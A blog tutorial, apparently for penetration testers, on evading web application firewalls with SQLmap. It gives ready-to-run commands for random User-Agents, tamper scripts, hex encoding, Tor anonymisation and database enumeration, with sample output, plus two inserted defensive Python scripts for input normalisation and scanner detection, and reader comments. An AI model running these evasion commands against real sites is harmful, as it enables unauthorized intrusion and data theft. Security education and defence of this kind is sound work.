Bypassing Web Application Firewalls (WAF) Using SQLmap

Learn how to bypass WAF effectively using SQLmap with practical examples. Explore SQL injection evasion techniques and enhance your penetration testing skills.

Web Application Firewalls (WAF) play a critical role in blocking malicious traffic and protecting web applications from SQL injection attacks. However, WAFs aren’t foolproof—understanding their limitations allows penetration testers to bypass them using advanced tools and techniques. SQLmap, a popular SQL injection tool, provides built-in features to evade WAF detection by using payload obfuscation, tamper scripts, header modifications, and proxy networks.

This article will demonstrate several methods for bypassing WAF using SQLmap with step-by-step examples, practical command outputs, and detailed explanations. Whether you’re conducting security assessments or expanding your ethical hacking skills, this guide will help you understand how to navigate WAF restrictions effectively.


Prerequisites

Before starting, make sure you have:

  • Termux installed: Download Termux.
  • SQLmap installed: Install with:

    pkg install python
    pip install sqlmap

  • A target web application: Ensure you have permission to test the system.
  • Proxy tool (e.g., Burp Suite): For analyzing blocked requests.
  • Optional: Tor Network: Configure Tor for anonymous SQLmap testing.

Bypassing WAF with SQLmap: Step-by-Step


Step 1: Initial SQL Injection Test

Begin by checking if the target is vulnerable to SQL injection.

Command:

sqlmap -u "http://target.com/page?id=1"

Sample Output:

[21:01:15] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS  
[21:01:15] [WARNING] WAF detected! Request blocked.  
[21:01:16] [ERROR] all tested parameters appear to be not injectable. 

Explanation:
This output shows that the request was blocked by the WAF. SQLmap detected that the target is protected, meaning you need to use advanced techniques to bypass the WAF.


Step 2: Using SQLmap to Bypass WAF


1. Random User-Agent Header

Some WAFs block requests based on the User-Agent string; SQLmap's default User-Agent identifies the tool (it begins with "sqlmap/"), so a signature-based WAF can reject it outright. Use SQLmap’s --random-agent option, which picks a common browser User-Agent from the list bundled with the tool, to evade this.

Command:

sqlmap -u "http://target.com/page?id=1" --random-agent

Sample Output:

[21:05:23] [INFO] using a randomly selected HTTP User-Agent  
[21:05:24] [INFO] GET parameter 'id' appears to be injectable.  
[21:05:25] [INFO] available databases:
[*] target_db

Explanation:
Using a random User-Agent header tricked the WAF, allowing SQLmap to proceed with the injection.


2. Tamper Scripts for Obfuscation

SQLmap offers tamper scripts that rewrite payloads so they no longer match WAF rules. For example, the between script replaces comparison operators: > becomes NOT BETWEEN 0 AND, and = becomes BETWEEN ... AND ..., so a signature keyed on those operators misses the payload.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=between

Sample Output:

[21:10:16] [INFO] GET parameter 'id' appears to be injectable.  
[21:10:17] [INFO] fetched data:  
Database: target_db  
[1 table found]  
+-------+  
| users |  
+-------+

Explanation:
The tamper script rewrote the payload so that it no longer matched the WAF's rules, and SQLmap went on to retrieve data.


3. Hex Encoding Payloads

Hex encoding transforms SQL queries into hexadecimal format, confusing WAFs that don’t decode payloads.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=hexencode

Sample Output:

[21:15:43] [INFO] GET parameter 'id' appears to be injectable.  
Database: target_db  
[2 tables found]  
+---------+  
| users   |  
| orders  |  
+---------+

Explanation:
By sending hex-encoded payloads, SQLmap bypassed the WAF filters and extracted data from the database.


4. Case Manipulation to Evade WAF

Some WAFs rely on case-sensitive keyword detection. SQLmap offers case manipulation through the uppercase, lowercase and randomcase tamper scripts.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=uppercase

Sample Output:

[21:20:12] [INFO] found database: target_db

Explanation:
The WAF’s filtering rules didn’t account for case changes, allowing the payload to bypass detection.
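Items 2 to 4 above all exploit a WAF that matches signatures against the raw input. The Python script below is added here as an illustration and is not code from the article or from the SQLmap project: it places a deliberately naive, case-sensitive rule beside a rule that normalises the value first (percent-decoding, decoding MySQL-style 0x hex literals into text, replacing inline comments with whitespace, collapsing whitespace, lower-casing) and runs both over constructed parameter values. The sample values, the signature patterns and the function names naive_match, normalize, hardened_match and compare are all assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed request parameter values (not taken from the article). The first is
# benign; the rest exercise the evasions described above: mixed case, a hex
# literal, inline comments instead of spaces, and URL encoding.
SAMPLES = {
    "benign":      "42",
    "plain":       "1 OR 1=1",
    "mixed_case":  "1 Or 1=1 UnIoN SeLeCt 1,2",
    "hex_literal": "1 AND 0x756e696f6e2073656c656374",   # hex for 'union select'
    "comments":    "1/**/UNION/**/SELECT/**/1",
    "url_encoded": "1%20UNION%20SELECT%201",
}

# Deliberately weak rule set: case-sensitive patterns applied to the raw value.
RAW_SIGNATURES = [r"\bUNION\b\s+\bSELECT\b", r"\bOR\b\s+1=1"]


def naive_match(value: str) -> bool:
    """Case-sensitive match on the raw, undecoded value (the weak rule)."""
    return any(re.search(p, value) for p in RAW_SIGNATURES)


def _decode_hex_literal(m: re.Match) -> str:
    """Turn a 0x.. literal into its text; leave it alone if it is not valid hex."""
    try:
        return bytes.fromhex(m.group(1)).decode("latin-1")
    except ValueError:          # odd length or non-hex: not a real literal
        return m.group(0)


def normalize(value: str) -> str:
    """Canonicalise a value before matching, undoing the transformations
    that case, comment and encoding tamper scripts rely on."""
    v = unquote_plus(value)                       # percent-decoding
    v = unquote_plus(v)                           # second pass catches double encoding
    v = re.sub(r"0x([0-9a-fA-F]+)", _decode_hex_literal, v)
    v = re.sub(r"/\*.*?\*/", " ", v)              # inline comments become whitespace
    v = re.sub(r"\s+", " ", v)                    # collapse runs of whitespace
    return v.lower()


# Same intent as RAW_SIGNATURES, but written against the normalised form.
NORM_SIGNATURES = [r"\bunion\b\s+\bselect\b", r"\bor\b\s+1=1"]


def hardened_match(value: str) -> bool:
    """Match on the normalised value, so case, comments and encoding no longer matter."""
    return any(re.search(p, normalize(value)) for p in NORM_SIGNATURES)


def compare(samples: dict = SAMPLES) -> dict:
    """Return {name: (naive_rule_fired, hardened_rule_fired)} for each sample."""
    return {name: (naive_match(v), hardened_match(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in compare().items():
        print(f"{name:12s} naive={naive!s:5s} hardened={hardened}")
```

The defender's takeaway is that the normalisation step, not a longer signature list, is what closes the case, comment and hex gaps; ModSecurity's transformation functions (for example t:lowercase, t:urlDecodeUni and t:removeComments) exist for the same reason and are applied before a rule's pattern is tested.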


Step 3: SQLmap with Proxy Tools for WAF Analysis

Use a proxy such as Burp Suite to inspect blocked requests and adjust SQLmap payloads accordingly.

Command:

sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"

Sample Output:

[21:25:46] [INFO] routing traffic through http://127.0.0.1:8080  
[21:25:50] [INFO] GET parameter 'id' appears to be injectable.  

Explanation:
A proxy helps you analyze the WAF’s behavior and fine-tune your SQLmap commands for better evasion.


Step 4: Anonymizing SQLmap Requests with Tor

To avoid IP-based blocking by WAFs, route SQLmap traffic through the Tor network.

Command:

sqlmap -u "http://target.com/page?id=1" --tor --tor-type=SOCKS5 --check-tor

Sample Output:

[21:30:33] [INFO] Tor connection confirmed  
[21:30:35] [INFO] GET parameter 'id' appears to be injectable.  

Explanation:
Using Tor hides your real IP address and helps bypass IP-based WAF restrictions.
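Item 1 of Step 2 (rotating the User-Agent) and Step 4 (rotating the source IP through Tor) both defeat detection that keys on a single header or a single address. The Python script below is an added defender's example, not code from the article or from the SQLmap project: it groups constructed access-log lines by session cookie instead of by client IP, and flags a session that presents the tool's default User-Agent, cycles through several User-Agents, or arrives from several client IPs. The log format, the session cookie field, the thresholds, the approximate default User-Agent string and the function names parse and analyze are all assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed access-log lines (not from the article). Assumed format:
#   client_ip sess=<cookie> "METHOD path" status "User-Agent"
# Session a1 uses the tool's default User-Agent; session b2 rotates both
# User-Agent and source IP; session c3 is an ordinary visitor.
LOG_LINES = """\
203.0.113.10 sess=a1 "GET /page?id=1" 200 "sqlmap/1.8 (https://sqlmap.org)"
203.0.113.10 sess=a1 "GET /page?id=1'" 403 "sqlmap/1.8 (https://sqlmap.org)"
198.51.100.7 sess=b2 "GET /page?id=1" 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/120"
198.51.100.7 sess=b2 "GET /page?id=1 AND 1=1" 200 "Mozilla/5.0 (X11; Linux) Firefox/118"
198.51.100.8 sess=b2 "GET /page?id=1 AND 1=2" 200 "Mozilla/5.0 (Macintosh) Safari/605"
198.51.100.9 sess=b2 "GET /page?id=1 UNION SELECT 1" 403 "Opera/9.80 (Windows NT 6.1)"
192.0.2.55 sess=c3 "GET /page?id=7" 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/120"
192.0.2.55 sess=c3 "GET /about" 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/120"
"""

LINE_RE = re.compile(r'^(\S+) sess=(\S+) "(\S+) ([^"]*)" (\d{3}) "([^"]*)"$')

UA_ROTATION_THRESHOLD = 3   # distinct User-Agents within one session (assumed)
IP_ROTATION_THRESHOLD = 3   # distinct client IPs within one session (assumed)


def parse(lines: str) -> list:
    """Parse log lines in the assumed format; lines that do not match are skipped."""
    records = []
    for line in lines.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, sess, method, path, status, ua = m.groups()
        records.append({"ip": ip, "session": sess, "method": method,
                        "path": path, "status": int(status), "ua": ua})
    return records


def analyze(lines: str = LOG_LINES) -> dict:
    """Return {session: [flags]} for sessions that look like a scanner.

    Grouping by session cookie rather than by client IP is what keeps the
    detection working when the source address changes on every request."""
    per_session = defaultdict(lambda: {"ips": set(), "uas": set(), "default_ua": False})
    for r in parse(lines):
        s = per_session[r["session"]]
        s["ips"].add(r["ip"])
        s["uas"].add(r["ua"])
        if r["ua"].startswith("sqlmap/"):
            s["default_ua"] = True

    findings = {}
    for sess, s in per_session.items():
        flags = []
        if s["default_ua"]:
            flags.append("sqlmap_default_user_agent")
        if len(s["uas"]) >= UA_ROTATION_THRESHOLD:
            flags.append("user_agent_rotation")
        if len(s["ips"]) >= IP_ROTATION_THRESHOLD:
            flags.append("client_ip_rotation")
        if flags:
            findings[sess] = flags
    return findings


if __name__ == "__main__":
    for sess, flags in analyze().items():
        print(sess, ", ".join(flags))
```

On the constructed input, session a1 is flagged only for the default User-Agent, b2 for both rotation patterns, and c3 not at all. The thresholds are illustrative; in a real deployment they should be tuned against normal traffic, and the same grouping can be applied to any stable per-client token (an authenticated user id, an API key) when there is no session cookie.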


Step 5: Extracting Data After Bypassing WAF

Once the WAF is bypassed, you can extract data from the database using SQLmap.

Command:

sqlmap -u "http://target.com/page?id=1" --dbs

Sample Output:

[21:35:10] [INFO] available databases:  
[*] information_schema  
[*] target_db  

Conclusion

Bypassing WAFs with SQLmap requires strategic use of random agents, tamper scripts, and encoding techniques. Analyzing blocked requests through proxies and using Tor for anonymity further improves your chances of evading WAFs. Mastering these methods will enhance your penetration testing abilities, but always remember to use them responsibly and with authorization.


Disclaimer

This article is for educational purposes only. Unauthorized use of these techniques is illegal and can result in severe penalties. Always ensure that you have permission before testing any web application.


  1. Orosco

    you will have an awesome weblog right here! would you prefer to make some invite posts on my blog?

    1. Sam Galope

      Thank you for the compliment! I’d be happy to collaborate and contribute some guest posts to your blog. Feel free to reach out to me via email at devdigest@samgalope.dev, and we can discuss ideas further!

  2. Chirsco

    Thanks for this wonderful article.

    1. Sam Galope

      Glad you found it helpful! Thanks for reading, and feel free to check out more articles on the site. Let me know if you have any questions!

  3. Meador

    My spouse and I absolutely love your blog and find many of your posts to be just what I’m looking for. Can you offer guest writers to write content available for you? I wouldn’t mind producing a post or elaborating on a lot of the subjects you write regarding here. Again, awesome weblog!

    1. Sam Galope

      Thank you so much for the kind words! I’m thrilled that you and your spouse enjoy the blog. We do consider guest writers, and I’d be happy to discuss potential collaboration opportunities. Feel free to check out our subscription page here for updates, and let me know if you’d like to talk more about contributing!

  4. Snively

    Hi, would you mind letting me know which hosting company you’re utilizing? I’ve loaded your blog in 3 completely different web browsers and I must say this blog loads a lot faster than most. Can you recommend a good internet hosting provider at a reasonable price? Cheers, I appreciate it!

    1. Sam Galope

      Thanks for noticing! A fast-loading site makes all the difference. I use Hostinger for hosting, and it’s been reliable, affordable, and performance-driven.

      If you’re looking for a great hosting provider at a reasonable price, I highly recommend checking them out:

      Get started with Hostinger here.

      Hope that helps, and happy blogging! 🚀

  5. Carmack

    Great beat! I would like to apprentice while you amend your web site; how could I subscribe for a blog site? The account helped me a acceptable deal. I had been a little bit acquainted of this your broadcast provided bright clear concept

    1. Sam Galope

      Thank you! 😊 I’m glad you found the post helpful. SQLmap is a powerful tool, and understanding how Web Application Firewalls (WAFs) work is essential for ethical security testing. In an upcoming post, I’ll cover techniques for bypassing WAFs responsibly, legal considerations, and best practices for penetration testing.

      If you’d like to stay updated with new posts, you can subscribe to the blog—let me know, and I’ll share the details! 🚀

      Meanwhile, feel free to check out more WAF content here:
      Ethical Hacking Archives.

      Happy learning, and stay ethical! 🔐😊

  6. Gerwig

    Thank you for sharing this article with me. It helped me a lot and I love it.

    1. Sam Galope

      Glad you found it helpful! 😊 Always remember to use security tools like SQLmap responsibly for ethical security testing and vulnerability assessments. If you’re into cybersecurity, you might enjoy exploring more topics in open-source security!

      Check out this guide as well:
      How to Monitor Soil Moisture Levels with an ESP32 and Soil Moisture Sensor using MicroPython

      Thanks for reading, and stay secure! 🔒🚀

  7. Anderon

    You’ve been great to me. Thank you!

    1. Sam Galope

      I’m really glad you found the article helpful! 😊 Bypassing Web Application Firewalls (WAF) with SQLmap is a fascinating topic, especially when exploring different evasion techniques.

      Also, you might enjoy this related read:
      👉 Mouse Jiggler Reddit Debate: Why Remote Workers Use Them.

      Thanks for reading and supporting the blog! 🚀